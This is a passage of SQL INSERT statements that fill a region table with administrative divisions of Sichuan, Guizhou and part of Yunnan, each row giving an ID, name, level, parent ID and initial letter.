INSERT INTO `ey_region` VALUES ('33189', '郫县', '3', '33008', 'P');
INSERT INTO `ey_region` VALUES ('33205', '大邑县', '3', '33008', 'D');
INSERT INTO `ey_region` VALUES ('33226', '蒲江县', '3', '33008', 'P');
INSERT INTO `ey_region` VALUES ('33239', '新津县', '3', '33008', 'X');
INSERT INTO `ey_region` VALUES ('33252', '都江堰市', '3', '33008', 'D');
INSERT INTO `ey_region` VALUES ('33272', '彭州市', '3', '33008', 'P');
INSERT INTO `ey_region` VALUES ('33293', '邛崃市', '3', '33008', 'Q');
INSERT INTO `ey_region` VALUES ('33318', '崇州市', '3', '33008', 'C');
INSERT INTO `ey_region` VALUES ('33344', '自贡市', '2', '33007', 'Z');
INSERT INTO `ey_region` VALUES ('33345', '市辖区', '3', '33344', 'S');
INSERT INTO `ey_region` VALUES ('33346', '自流井区', '3', '33344', 'Z');
INSERT INTO `ey_region` VALUES ('33360', '贡井区', '3', '33344', 'G');
INSERT INTO `ey_region` VALUES ('33374', '大安区', '3', '33344', 'D');
INSERT INTO `ey_region` VALUES ('33391', '沿滩区', '3', '33344', 'Y');
INSERT INTO `ey_region` VALUES ('33405', '荣县', '3', '33344', 'R');
INSERT INTO `ey_region` VALUES ('33433', '富顺县', '3', '33344', 'F');
INSERT INTO `ey_region` VALUES ('33460', '攀枝花市', '2', '33007', 'P');
INSERT INTO `ey_region` VALUES ('33461', '市辖区', '3', '33460', 'S');
INSERT INTO `ey_region` VALUES ('33462', '攀枝花东区', '3', '33460', 'P');
INSERT INTO `ey_region` VALUES ('33473', '西区', '3', '33460', 'X');
INSERT INTO `ey_region` VALUES ('33481', '仁和区', '3', '33460', 'R');
INSERT INTO `ey_region` VALUES ('33497', '米易县', '3', '33460', 'M');
INSERT INTO `ey_region` VALUES ('33511', '盐边县', '3', '33460', 'Y');
INSERT INTO `ey_region` VALUES ('33528', '泸州市', '2', '33007', 'L');
INSERT INTO `ey_region` VALUES ('33529', '市辖区', '3', '33528', 'S');
INSERT INTO `ey_region` VALUES ('33530', '江阳区', '3', '33528', 'J');
INSERT INTO `ey_region` VALUES ('33548', '纳溪区', '3', '33528', 'N');
INSERT INTO `ey_region` VALUES ('33563', '龙马潭区', '3', '33528', 'L');
INSERT INTO `ey_region` VALUES ('33577', '泸县', '3', '33528', 'L');
INSERT INTO `ey_region` VALUES ('33597', '合江县', '3', '33528', 'H');
INSERT INTO `ey_region` VALUES ('33625', '叙永县', '3', '33528', 'X');
INSERT INTO `ey_region` VALUES ('33654', '古蔺县', '3', '33528', 'G');
INSERT INTO `ey_region` VALUES ('33681', '德阳市', '2', '33007', 'D');
INSERT INTO `ey_region` VALUES ('33682', '市辖区', '3', '33681', 'S');
INSERT INTO `ey_region` VALUES ('33683', '旌阳区', '3', '33681', 'J');
INSERT INTO `ey_region` VALUES ('33701', '中江县', '3', '33681', 'Z');
INSERT INTO `ey_region` VALUES ('33747', '罗江县', '3', '33681', 'L');
INSERT INTO `ey_region` VALUES ('33758', '广汉市', '3', '33681', 'G');
INSERT INTO `ey_region` VALUES ('33778', '什邡市', '3', '33681', 'S');
INSERT INTO `ey_region` VALUES ('33795', '绵竹市', '3', '33681', 'M');
INSERT INTO `ey_region` VALUES ('33817', '绵阳市', '2', '33007', 'M');
INSERT INTO `ey_region` VALUES ('33818', '市辖区', '3', '33817', 'S');
INSERT INTO `ey_region` VALUES ('33819', '涪城区', '3', '33817', 'F');
INSERT INTO `ey_region` VALUES ('33844', '游仙区', '3', '33817', 'Y');
INSERT INTO `ey_region` VALUES ('33873', '三台县', '3', '33817', 'S');
INSERT INTO `ey_region` VALUES ('33937', '盐亭县', '3', '33817', 'Y');
INSERT INTO `ey_region` VALUES ('33974', '安县', '3', '33817', 'A');
INSERT INTO `ey_region` VALUES ('33995', '梓潼县', '3', '33817', 'Z');
INSERT INTO `ey_region` VALUES ('34028', '北川县', '3', '33817', 'B');
INSERT INTO `ey_region` VALUES ('34049', '平武县', '3', '33817', 'P');
INSERT INTO `ey_region` VALUES ('34075', '江油市', '3', '33817', 'J');
INSERT INTO `ey_region` VALUES ('34120', '广元市', '2', '33007', 'G');
INSERT INTO `ey_region` VALUES ('34121', '市辖区', '3', '34120', 'S');
INSERT INTO `ey_region` VALUES ('34122', '市中区', '3', '34120', 'S');
INSERT INTO `ey_region` VALUES ('34143', '元坝区', '3', '34120', 'Y');
INSERT INTO `ey_region` VALUES ('34173', '朝天区', '3', '34120', 'C');
INSERT INTO `ey_region` VALUES ('34199', '旺苍县', '3', '34120', 'W');
INSERT INTO `ey_region` VALUES ('34238', '青川县', '3', '34120', 'Q');
INSERT INTO `ey_region` VALUES ('34276', '剑阁县', '3', '34120', 'J');
INSERT INTO `ey_region` VALUES ('34334', '苍溪县', '3', '34120', 'C');
INSERT INTO `ey_region` VALUES ('34376', '遂宁市', '2', '33007', 'S');
INSERT INTO `ey_region` VALUES ('34377', '市辖区', '3', '34376', 'S');
INSERT INTO `ey_region` VALUES ('34378', '船山区', '3', '34376', 'C');
INSERT INTO `ey_region` VALUES ('34404', '安居区', '3', '34376', 'A');
INSERT INTO `ey_region` VALUES ('34426', '蓬溪县', '3', '34376', 'P');
INSERT INTO `ey_region` VALUES ('34458', '射洪县', '3', '34376', 'S');
INSERT INTO `ey_region` VALUES ('34489', '大英县', '3', '34376', 'D');
INSERT INTO `ey_region` VALUES ('34501', '内江市', '2', '33007', 'N');
INSERT INTO `ey_region` VALUES ('34502', '市辖区', '3', '34501', 'S');
INSERT INTO `ey_region` VALUES ('34503', '市中区', '3', '34501', 'S');
INSERT INTO `ey_region` VALUES ('34524', '东兴区', '3', '34501', 'D');
INSERT INTO `ey_region` VALUES ('34554', '威远县', '3', '34501', 'W');
INSERT INTO `ey_region` VALUES ('34575', '资中县', '3', '34501', 'Z');
INSERT INTO `ey_region` VALUES ('34609', '隆昌县', '3', '34501', 'L');
INSERT INTO `ey_region` VALUES ('34628', '乐山市', '2', '33007', 'L');
INSERT INTO `ey_region` VALUES ('34629', '市辖区', '3', '34628', 'S');
INSERT INTO `ey_region` VALUES ('34630', '市中区', '3', '34628', 'S');
INSERT INTO `ey_region` VALUES ('34661', '沙湾区', '3', '34628', 'S');
INSERT INTO `ey_region` VALUES ('34676', '五通桥区', '3', '34628', 'W');
INSERT INTO `ey_region` VALUES ('34689', '金口河区', '3', '34628', 'J');
INSERT INTO `ey_region` VALUES ('34696', '犍为县', '3', '34628', 'Q');
INSERT INTO `ey_region` VALUES ('34727', '井研县', '3', '34628', 'J');
INSERT INTO `ey_region` VALUES ('34755', '夹江县', '3', '34628', 'J');
INSERT INTO `ey_region` VALUES ('34778', '沐川县', '3', '34628', 'M');
INSERT INTO `ey_region` VALUES ('34799', '峨边县', '3', '34628', 'E');
INSERT INTO `ey_region` VALUES ('34819', '马边县', '3', '34628', 'M');
INSERT INTO `ey_region` VALUES ('34840', '峨眉山市', '3', '34628', 'E');
INSERT INTO `ey_region` VALUES ('34859', '南充市', '2', '33007', 'N');
INSERT INTO `ey_region` VALUES ('34860', '市辖区', '3', '34859', 'S');
INSERT INTO `ey_region` VALUES ('34861', '顺庆区', '3', '34859', 'S');
INSERT INTO `ey_region` VALUES ('34890', '高坪区', '3', '34859', 'G');
INSERT INTO `ey_region` VALUES ('34923', '嘉陵区', '3', '34859', 'J');
INSERT INTO `ey_region` VALUES ('34967', '南部县', '3', '34859', 'N');
INSERT INTO `ey_region` VALUES ('35040', '营山县', '3', '34859', 'Y');
INSERT INTO `ey_region` VALUES ('35094', '蓬安县', '3', '34859', 'P');
INSERT INTO `ey_region` VALUES ('35134', '仪陇县', '3', '34859', 'Y');
INSERT INTO `ey_region` VALUES ('35193', '西充县', '3', '34859', 'X');
INSERT INTO `ey_region` VALUES ('35238', '阆中市', '3', '34859', 'L');
INSERT INTO `ey_region` VALUES ('35288', '眉山市', '2', '33007', 'M');
INSERT INTO `ey_region` VALUES ('35289', '市辖区', '3', '35288', 'S');
INSERT INTO `ey_region` VALUES ('35290', '东坡区', '3', '35288', 'D');
INSERT INTO `ey_region` VALUES ('35317', '仁寿县', '3', '35288', 'R');
INSERT INTO `ey_region` VALUES ('35378', '彭山县', '3', '35288', 'P');
INSERT INTO `ey_region` VALUES ('35392', '洪雅县', '3', '35288', 'H');
INSERT INTO `ey_region` VALUES ('35408', '丹棱县', '3', '35288', 'D');
INSERT INTO `ey_region` VALUES ('35416', '青神县', '3', '35288', 'Q');
INSERT INTO `ey_region` VALUES ('35427', '宜宾市', '2', '33007', 'Y');
INSERT INTO `ey_region` VALUES ('35428', '市辖区', '3', '35427', 'S');
INSERT INTO `ey_region` VALUES ('35429', '翠屏区', '3', '35427', 'C');
INSERT INTO `ey_region` VALUES ('35454', '宜宾县', '3', '35427', 'Y');
INSERT INTO `ey_region` VALUES ('35481', '南溪县', '3', '35427', 'N');
INSERT INTO `ey_region` VALUES ('35497', '江安县', '3', '35427', 'J');
INSERT INTO `ey_region` VALUES ('35516', '长宁县', '3', '35427', 'C');
INSERT INTO `ey_region` VALUES ('35535', '高县', '3', '35427', 'G');
INSERT INTO `ey_region` VALUES ('35555', '珙县', '3', '35427', 'G');
INSERT INTO `ey_region` VALUES ('35573', '筠连县', '3', '35427', 'J');
INSERT INTO `ey_region` VALUES ('35592', '兴文县', '3', '35427', 'X');
INSERT INTO `ey_region` VALUES ('35608', '屏山县', '3', '35427', 'P');
INSERT INTO `ey_region` VALUES ('35625', '广安市', '2', '33007', 'G');
INSERT INTO `ey_region` VALUES ('35626', '市辖区', '3', '35625', 'S');
INSERT INTO `ey_region` VALUES ('35627', '广安区', '3', '35625', 'G');
INSERT INTO `ey_region` VALUES ('35677', '岳池县', '3', '35625', 'Y');
INSERT INTO `ey_region` VALUES ('35721', '武胜县', '3', '35625', 'W');
INSERT INTO `ey_region` VALUES ('35753', '邻水县', '3', '35625', 'L');
INSERT INTO `ey_region` VALUES ('35799', '华蓥市', '3', '35625', 'H');
INSERT INTO `ey_region` VALUES ('35813', '达州市', '2', '33007', 'D');
INSERT INTO `ey_region` VALUES ('35814', '市辖区', '3', '35813', 'S');
INSERT INTO `ey_region` VALUES ('35815', '通川区', '3', '35813', 'T');
INSERT INTO `ey_region` VALUES ('35829', '达县', '3', '35813', 'D');
INSERT INTO `ey_region` VALUES ('35894', '宣汉县', '3', '35813', 'X');
INSERT INTO `ey_region` VALUES ('35949', '开江县', '3', '35813', 'K');
INSERT INTO `ey_region` VALUES ('35970', '大竹县', '3', '35813', 'D');
INSERT INTO `ey_region` VALUES ('36021', '渠县', '3', '35813', 'Q');
INSERT INTO `ey_region` VALUES ('36082', '万源市', '3', '35813', 'W');
INSERT INTO `ey_region` VALUES ('36136', '雅安市', '2', '33007', 'Y');
INSERT INTO `ey_region` VALUES ('36137', '市辖区', '3', '36136', 'S');
INSERT INTO `ey_region` VALUES ('36138', '雨城区', '3', '36136', 'Y');
INSERT INTO `ey_region` VALUES ('36161', '名山县', '3', '36136', 'M');
INSERT INTO `ey_region` VALUES ('36182', '荥经县', '3', '36136', 'Y');
INSERT INTO `ey_region` VALUES ('36204', '汉源县', '3', '36136', 'H');
INSERT INTO `ey_region` VALUES ('36245', '石棉县', '3', '36136', 'S');
INSERT INTO `ey_region` VALUES ('36263', '天全县', '3', '36136', 'T');
INSERT INTO `ey_region` VALUES ('36279', '芦山县', '3', '36136', 'L');
INSERT INTO `ey_region` VALUES ('36289', '宝兴县', '3', '36136', 'B');
INSERT INTO `ey_region` VALUES ('36299', '巴中市', '2', '33007', 'B');
INSERT INTO `ey_region` VALUES ('36300', '市辖区', '3', '36299', 'S');
INSERT INTO `ey_region` VALUES ('36301', '巴州区', '3', '36299', 'B');
INSERT INTO `ey_region` VALUES ('36354', '通江县', '3', '36299', 'T');
INSERT INTO `ey_region` VALUES ('36404', '南江县', '3', '36299', 'N');
INSERT INTO `ey_region` VALUES ('36453', '平昌县', '3', '36299', 'P');
INSERT INTO `ey_region` VALUES ('36497', '资阳市', '2', '33007', 'Z');
INSERT INTO `ey_region` VALUES ('36498', '市辖区', '3', '36497', 'S');
INSERT INTO `ey_region` VALUES ('36499', '雁江区', '3', '36497', 'Y');
INSERT INTO `ey_region` VALUES ('36527', '安岳县', '3', '36497', 'A');
INSERT INTO `ey_region` VALUES ('36597', '乐至县', '3', '36497', 'L');
INSERT INTO `ey_region` VALUES ('36623', '简阳市', '3', '36497', 'J');
INSERT INTO `ey_region` VALUES ('36679', '阿坝州', '2', '33007', 'A');
INSERT INTO `ey_region` VALUES ('36680', '汶川县', '3', '36679', 'W');
INSERT INTO `ey_region` VALUES ('36694', '理县', '3', '36679', 'L');
INSERT INTO `ey_region` VALUES ('36708', '茂县', '3', '36679', 'M');
INSERT INTO `ey_region` VALUES ('36731', '松潘县', '3', '36679', 'S');
INSERT INTO `ey_region` VALUES ('36759', '九寨沟县', '3', '36679', 'J');
INSERT INTO `ey_region` VALUES ('36778', '金川县', '3', '36679', 'J');
INSERT INTO `ey_region` VALUES ('36802', '小金县', '3', '36679', 'X');
INSERT INTO `ey_region` VALUES ('36824', '黑水县', '3', '36679', 'H');
INSERT INTO `ey_region` VALUES ('36842', '马尔康县', '3', '36679', 'M');
INSERT INTO `ey_region` VALUES ('36858', '壤塘县', '3', '36679', 'R');
INSERT INTO `ey_region` VALUES ('36871', '阿坝县', '3', '36679', 'A');
INSERT INTO `ey_region` VALUES ('36893', '若尔盖县', '3', '36679', 'R');
INSERT INTO `ey_region` VALUES ('36914', '红原县', '3', '36679', 'H');
INSERT INTO `ey_region` VALUES ('36926', '甘孜州', '2', '33007', 'G');
INSERT INTO `ey_region` VALUES ('36927', '康定县', '3', '36926', 'K');
INSERT INTO `ey_region` VALUES ('36949', '泸定县', '3', '36926', 'L');
INSERT INTO `ey_region` VALUES ('36962', '丹巴县', '3', '36926', 'D');
INSERT INTO `ey_region` VALUES ('36978', '九龙县', '3', '36926', 'J');
INSERT INTO `ey_region` VALUES ('36997', '雅江县', '3', '36926', 'Y');
INSERT INTO `ey_region` VALUES ('37015', '道孚县', '3', '36926', 'D');
INSERT INTO `ey_region` VALUES ('37038', '炉霍县', '3', '36926', 'L');
INSERT INTO `ey_region` VALUES ('37055', '甘孜县', '3', '36926', 'G');
INSERT INTO `ey_region` VALUES ('37078', '新龙县', '3', '36926', 'X');
INSERT INTO `ey_region` VALUES ('37098', '德格县', '3', '36926', 'D');
INSERT INTO `ey_region` VALUES ('37125', '白玉县', '3', '36926', 'B');
INSERT INTO `ey_region` VALUES ('37143', '石渠县', '3', '36926', 'S');
INSERT INTO `ey_region` VALUES ('37166', '色达县', '3', '36926', 'S');
INSERT INTO `ey_region` VALUES ('37184', '理塘县', '3', '36926', 'L');
INSERT INTO `ey_region` VALUES ('37209', '巴塘县', '3', '36926', 'B');
INSERT INTO `ey_region` VALUES ('37229', '乡城县', '3', '36926', 'X');
INSERT INTO `ey_region` VALUES ('37242', '稻城县', '3', '36926', 'D');
INSERT INTO `ey_region` VALUES ('37257', '得荣县', '3', '36926', 'D');
INSERT INTO `ey_region` VALUES ('37270', '凉山州', '2', '33007', 'L');
INSERT INTO `ey_region` VALUES ('37271', '西昌市', '3', '37270', 'X');
INSERT INTO `ey_region` VALUES ('37315', '木里县', '3', '37270', 'M');
INSERT INTO `ey_region` VALUES ('37345', '盐源县', '3', '37270', 'Y');
INSERT INTO `ey_region` VALUES ('37380', '德昌', '3', '37270', 'D');
INSERT INTO `ey_region` VALUES ('37404', '会理县', '3', '37270', 'H');
INSERT INTO `ey_region` VALUES ('37455', '会东县', '3', '37270', 'H');
INSERT INTO `ey_region` VALUES ('37509', '宁南县', '3', '37270', 'N');
INSERT INTO `ey_region` VALUES ('37535', '普格县', '3', '37270', 'P');
INSERT INTO `ey_region` VALUES ('37570', '布拖县', '3', '37270', 'B');
INSERT INTO `ey_region` VALUES ('37601', '金阳县', '3', '37270', 'J');
INSERT INTO `ey_region` VALUES ('37636', '昭觉县', '3', '37270', 'Z');
INSERT INTO `ey_region` VALUES ('37684', '喜德县', '3', '37270', 'X');
INSERT INTO `ey_region` VALUES ('37709', '冕宁县', '3', '37270', 'M');
INSERT INTO `ey_region` VALUES ('37748', '越西县', '3', '37270', 'Y');
INSERT INTO `ey_region` VALUES ('37790', '甘洛县', '3', '37270', 'G');
INSERT INTO `ey_region` VALUES ('37819', '美姑县', '3', '37270', 'M');
INSERT INTO `ey_region` VALUES ('37856', '雷波县', '3', '37270', 'L');
INSERT INTO `ey_region` VALUES ('37906', '贵州省', '1', '0', 'G');
INSERT INTO `ey_region` VALUES ('37907', '贵阳市', '2', '37906', 'G');
INSERT INTO `ey_region` VALUES ('37908', '市辖区', '3', '37907', 'S');
INSERT INTO `ey_region` VALUES ('37909', '南明区', '3', '37907', 'N');
INSERT INTO `ey_region` VALUES ('37927', '云岩区', '3', '37907', 'Y');
INSERT INTO `ey_region` VALUES ('37944', '花溪区', '3', '37907', 'H');
INSERT INTO `ey_region` VALUES ('37961', '乌当区', '3', '37907', 'W');
INSERT INTO `ey_region` VALUES ('37977', '白云区', '3', '37907', 'B');
INSERT INTO `ey_region` VALUES ('37987', '小河区', '3', '37907', 'X');
INSERT INTO `ey_region` VALUES ('37991', '开阳县', '3', '37907', 'K');
INSERT INTO `ey_region` VALUES ('38008', '息烽县', '3', '37907', 'X');
INSERT INTO `ey_region` VALUES ('38019', '修文县', '3', '37907', 'X');
INSERT INTO `ey_region` VALUES ('38030', '清镇市', '3', '37907', 'Q');
INSERT INTO `ey_region` VALUES ('38042', '六盘水市', '2', '37906', 'L');
INSERT INTO `ey_region` VALUES ('38043', '钟山区', '3', '38042', 'Z');
INSERT INTO `ey_region` VALUES ('38053', '六枝特区', '3', '38042', 'L');
INSERT INTO `ey_region` VALUES ('38073', '水城县', '3', '38042', 'S');
INSERT INTO `ey_region` VALUES ('38107', '盘县', '3', '38042', 'P');
INSERT INTO `ey_region` VALUES ('38145', '遵义市', '2', '37906', 'Z');
INSERT INTO `ey_region` VALUES ('38146', '市辖区', '3', '38145', 'S');
INSERT INTO `ey_region` VALUES ('38147', '红花岗区', '3', '38145', 'H');
INSERT INTO `ey_region` VALUES ('38164', '汇川区', '3', '38145', 'H');
INSERT INTO `ey_region` VALUES ('38174', '遵义县', '3', '38145', 'Z');
INSERT INTO `ey_region` VALUES ('38206', '桐梓县', '3', '38145', 'T');
INSERT INTO `ey_region` VALUES ('38231', '绥阳县', '3', '38145', 'S');
INSERT INTO `ey_region` VALUES ('38247', '正安县', '3', '38145', 'Z');
INSERT INTO `ey_region` VALUES ('38267', '道真县', '3', '38145', 'D');
INSERT INTO `ey_region` VALUES ('38282', '务川县', '3', '38145', 'W');
INSERT INTO `ey_region` VALUES ('38298', '凤冈县', '3', '38145', 'F');
INSERT INTO `ey_region` VALUES ('38313', '湄潭县', '3', '38145', 'M');
INSERT INTO `ey_region` VALUES ('38329', '余庆县', '3', '38145', 'Y');
INSERT INTO `ey_region` VALUES ('38340', '习水县', '3', '38145', 'X');
INSERT INTO `ey_region` VALUES ('38364', '赤水市', '3', '38145', 'C');
INSERT INTO `ey_region` VALUES ('38382', '仁怀市', '3', '38145', 'R');
INSERT INTO `ey_region` VALUES ('38402', '安顺市', '2', '37906', 'A');
INSERT INTO `ey_region` VALUES ('38403', '市辖区', '3', '38402', 'S');
INSERT INTO `ey_region` VALUES ('38404', '西秀区', '3', '38402', 'X');
INSERT INTO `ey_region` VALUES ('38429', '平坝县', '3', '38402', 'P');
INSERT INTO `ey_region` VALUES ('38440', '普定县', '3', '38402', 'P');
INSERT INTO `ey_region` VALUES ('38452', '镇宁县', '3', '38402', 'Z');
INSERT INTO `ey_region` VALUES ('38469', '关岭县', '3', '38402', 'G');
INSERT INTO `ey_region` VALUES ('38484', '紫云县', '3', '38402', 'Z');
INSERT INTO `ey_region` VALUES ('38497', '铜仁地区', '2', '37906', 'T');
INSERT INTO `ey_region` VALUES ('38498', '铜仁市', '3', '38497', 'T');
INSERT INTO `ey_region` VALUES ('38516', '江口县', '3', '38497', 'J');
INSERT INTO `ey_region` VALUES ('38526', '玉屏县', '3', '38497', 'Y');
INSERT INTO `ey_region` VALUES ('38533', '石阡县', '3', '38497', 'S');
INSERT INTO `ey_region` VALUES ('38552', '思南县 ', '3', '38497', 'S');
INSERT INTO `ey_region` VALUES ('38580', '印江县', '3', '38497', 'Y');
INSERT INTO `ey_region` VALUES ('38598', '德江县', '3', '38497', 'D');
INSERT INTO `ey_region` VALUES ('38619', '沿河县', '3', '38497', 'Y');
INSERT INTO `ey_region` VALUES ('38642', '松桃县', '3', '38497', 'S');
INSERT INTO `ey_region` VALUES ('38671', '万山特区', '3', '38497', 'W');
INSERT INTO `ey_region` VALUES ('38677', '黔西南州', '2', '37906', 'Q');
INSERT INTO `ey_region` VALUES ('38678', '兴义市', '3', '38677', 'X');
INSERT INTO `ey_region` VALUES ('38705', '兴仁县', '3', '38677', 'X');
INSERT INTO `ey_region` VALUES ('38722', '普安县', '3', '38677', 'P');
INSERT INTO `ey_region` VALUES ('38737', '晴隆县', '3', '38677', 'Q');
INSERT INTO `ey_region` VALUES ('38752', '贞丰县', '3', '38677', 'Z');
INSERT INTO `ey_region` VALUES ('38766', '望谟县', '3', '38677', 'W');
INSERT INTO `ey_region` VALUES ('38784', '册亨县', '3', '38677', 'C');
INSERT INTO `ey_region` VALUES ('38799', '安龙县', '3', '38677', 'A');
INSERT INTO `ey_region` VALUES ('38816', '毕节地区', '2', '37906', 'B');
INSERT INTO `ey_region` VALUES ('38817', '毕节市', '3', '38816', 'B');
INSERT INTO `ey_region` VALUES ('38859', '大方县', '3', '38816', 'D');
INSERT INTO `ey_region` VALUES ('38896', '黔西县', '3', '38816', 'Q');
INSERT INTO `ey_region` VALUES ('38925', '金沙县', '3', '38816', 'J');
INSERT INTO `ey_region` VALUES ('38952', '织金县', '3', '38816', 'Z');
INSERT INTO `ey_region` VALUES ('38985', '纳雍县', '3', '38816', 'N');
INSERT INTO `ey_region` VALUES ('39011', '威宁县', '3', '38816', 'W');
INSERT INTO `ey_region` VALUES ('39047', '赫章县', '3', '38816', 'H');
INSERT INTO `ey_region` VALUES ('39075', '黔东南州', '2', '37906', 'Q');
INSERT INTO `ey_region` VALUES ('39076', '凯里市', '3', '39075', 'K');
INSERT INTO `ey_region` VALUES ('39092', '黄平县', '3', '39075', 'H');
INSERT INTO `ey_region` VALUES ('39107', '施秉县', '3', '39075', 'S');
INSERT INTO `ey_region` VALUES ('39116', '三穗县', '3', '39075', 'S');
INSERT INTO `ey_region` VALUES ('39126', '镇远县', '3', '39075', 'Z');
INSERT INTO `ey_region` VALUES ('39139', '岑巩县', '3', '39075', 'C');
INSERT INTO `ey_region` VALUES ('39151', '天柱县', '3', '39075', 'T');
INSERT INTO `ey_region` VALUES ('39168', '锦屏县', '3', '39075', 'J');
INSERT INTO `ey_region` VALUES ('39184', '剑河县', '3', '39075', 'J');
INSERT INTO `ey_region` VALUES ('39197', '台江县', '3', '39075', 'T');
INSERT INTO `ey_region` VALUES ('39206', '黎平县', '3', '39075', 'L');
INSERT INTO `ey_region` VALUES ('39232', '榕江县', '3', '39075', 'R');
INSERT INTO `ey_region` VALUES ('39252', '从江县', '3', '39075', 'C');
INSERT INTO `ey_region` VALUES ('39274', '雷山县', '3', '39075', 'L');
INSERT INTO `ey_region` VALUES ('39284', '麻江县', '3', '39075', 'M');
INSERT INTO `ey_region` VALUES ('39294', '丹寨县', '3', '39075', 'D');
INSERT INTO `ey_region` VALUES ('39302', '黔南州', '2', '37906', 'Q');
INSERT INTO `ey_region` VALUES ('39303', '都匀市', '3', '39302', 'D');
INSERT INTO `ey_region` VALUES ('39327', '福泉市', '3', '39302', 'F');
INSERT INTO `ey_region` VALUES ('39345', '荔波县', '3', '39302', 'L');
INSERT INTO `ey_region` VALUES ('39363', '贵定县', '3', '39302', 'G');
INSERT INTO `ey_region` VALUES ('39384', '瓮安县', '3', '39302', 'W');
INSERT INTO `ey_region` VALUES ('39408', '独山县', '3', '39302', 'D');
INSERT INTO `ey_region` VALUES ('39427', '平塘县', '3', '39302', 'P');
INSERT INTO `ey_region` VALUES ('39447', '罗甸县', '3', '39302', 'L');
INSERT INTO `ey_region` VALUES ('39474', '长顺县', '3', '39302', 'C');
INSERT INTO `ey_region` VALUES ('39493', '龙里县', '3', '39302', 'L');
INSERT INTO `ey_region` VALUES ('39508', '惠水县', '3', '39302', 'H');
INSERT INTO `ey_region` VALUES ('39534', '三都县', '3', '39302', 'S');
INSERT INTO `ey_region` VALUES ('39556', '云南省', '1', '0', 'Y');
INSERT INTO `ey_region` VALUES ('39557', '昆明市', '2', '39556', 'K');
INSERT INTO `ey_region` VALUES ('39558', '市辖区', '3', '39557', 'S');
INSERT INTO `ey_region` VALUES ('39559', '五华区', '3', '39557', 'W');
INSERT INTO `ey_region` VALUES ('39571', '盘龙区', '3', '39557', 'P');
INSERT INTO `ey_region` VALUES ('39582', '官渡区', '3', '39557', 'G');
INSERT INTO `ey_region` VALUES ('39594', '西山区', '3', '39557', 'X');
INSERT INTO `ey_region` VALUES ('39605', '东川区', '3', '39557', 'D');
INSERT INTO `ey_region` VALUES ('39614', '呈贡县', '3', '39557', 'C');
INSERT INTO `ey_region` VALUES ('39622', '晋宁县', '3', '39557', 'J');
INSERT INTO `ey_region` VALUES ('39632', '富民县', '3', '39557', 'F');
INSERT INTO `ey_region` VALUES ('39640', '宜良县', '3', '39557', 'Y');
INSERT INTO `ey_region` VALUES ('39650', '石林县', '3', '39557', 'S');
INSERT INTO `ey_region` VALUES ('39659', '嵩明县', '3', '39557', 'S');
INSERT INTO `ey_region` VALUES ('39667', '禄劝县', '3', '39557', 'L');
INSERT INTO `ey_region` VALUES ('39684', '寻甸县', '3', '39557', 'X');
INSERT INTO `ey_region` VALUES ('39701', '安宁市', '3', '39557', 'A');
INSERT INTO `ey_region` VALUES ('39710', '曲靖市', '2', '39556', 'Q');
INSERT INTO `ey_region` VALUES ('39711', '市辖区', '3', '39710', 'S');
INSERT INTO `ey_region` VALUES ('39712', '麒麟区', '3', '39710', 'Q');
INSERT INTO `ey_region` VALUES ('39724', '马龙县', '3', '39710', 'M');
INSERT INTO `ey_region` VALUES ('39733', '陆良县', '3', '39710', 'L');
INSERT INTO `ey_region` VALUES ('39744', '师宗县', '3', '39710', 'S');
INSERT INTO `ey_region` VALUES ('39753', '罗平县', '3', '39710', 'L');
INSERT INTO `ey_region` VALUES ('39766', '富源县', '3', '39710', 'F');
INSERT INTO `ey_region` VALUES ('39778', '会泽县', '3', '39710', 'H');
INSERT INTO `ey_region` VALUES ('39800', '沾益县', '3', '39710', 'Z');
INSERT INTO `ey_region` VALUES ('39809', '宣威市', '3', '39710', 'X');
INSERT INTO `ey_region` VALUES ('39836', '玉溪市', '2', '39556', 'Y');
INSERT INTO `ey_region` VALUES ('39837', '市辖区', '3', '39836', 'S');
INSERT INTO `ey_region` VALUES ('39838', '红塔区', '3', '39836', 'H');
INSERT INTO `ey_region` VALUES ('39850', '江川县', '3', '39836', 'J');
INSERT INTO `ey_region` VALUES ('39858', '澄江县', '3', '39836', 'C');
INSERT INTO `ey_region` VALUES ('39865', '通海县', '3', '39836', 'T');
INSERT INTO `ey_region` VALUES ('39875', '华宁县', '3', '39836', 'H');
INSERT INTO `ey_region` VALUES ('39881', '易门县', '3', '39836', 'Y');
INSERT INTO `ey_region` VALUES ('39889', '峨山县', '3', '39836', 'E');
INSERT INTO `ey_region` VALUES ('39899', '新平县', '3', '39836', 'X');
INSERT INTO `ey_region` VALUES ('39912', '元江县', '3', '39836', 'Y');
INSERT INTO `ey_region` VALUES ('39923', '保山市', '2', '39556', 'B');
INSERT INTO `ey_region` VALUES ('39924', '市辖区', '3', '39923', 'S');
INSERT INTO `ey_region` VALUES ('39925', '隆阳区', '3', '39923', 'L');
INSERT INTO `ey_region` VALUES ('39946', '施甸县', '3', '39923', 'S');
INSERT INTO `ey_region` VALUES ('39960', '腾冲县', '3', '39923', 'T');
INSERT INTO `ey_region` VALUES ('39979', '龙陵县', '3', '39923', 'L');
INSERT INTO `ey_region` VALUES ('39990', '昌宁县', '3', '39923', 'C');
INSERT INTO `ey_region` VALUES ('40004', '昭通市', '2', '39556', 'Z');
INSERT INTO `ey_region` VALUES ('40005', '市辖区', '3', '40004', 'S');
INSERT INTO `ey_region` VALUES ('40006', '昭阳区', '3', '40004', 'Z');
INSERT INTO `ey_region` VALUES ('40027', '鲁甸县', '3', '40004', 'L');
INSERT INTO `ey_region` VALUES ('40040', '巧家县', '3', '40004', 'Q');
INSERT INTO `ey_region` VALUES ('40057', '盐津县', '3', '40004', 'Y');
INSERT INTO `ey_region` VALUES ('40068', '大关县', '3', '40004', 'D');
INSERT INTO `ey_region` VALUES ('40078', '永善县', '3', '40004', 'Y');
INSERT INTO `ey_region` VALUES ('40094', '绥江县', '3', '40004', 'S');
INSERT INTO `ey_region` VALUES ('40100', '镇雄县', '3', '40004', 'Z');
INSERT INTO `ey_region` VALUES ('40129', '彝良县', '3', '40004', 'Y');
INSERT INTO `ey_region` VALUES ('40145', '威信县', '3', '40004', 'W');
INSERT INTO `ey_region` VALUES ('40156', '水富县', '3', '40004', 'S');
INSERT INTO `ey_region` VALUES ('40160', '丽江市', '2', '39556', 'L');
INSERT INTO `ey_region` VALUES ('40161', '市辖区', '3', '40160', 'S');
INSERT INTO `ey_region` VALUES ('40162', '古城区', '3', '40160', 'G');
INSERT INTO `ey_region` VALUES ('40172', '玉龙县', '3', '40160', 'Y');
INSERT INTO `ey_region` VALUES ('40189', '永胜县', '3', '40160', 'Y');
INSERT INTO `ey_region` VALUES ('40205', '华坪县', '3', '40160', 'H');
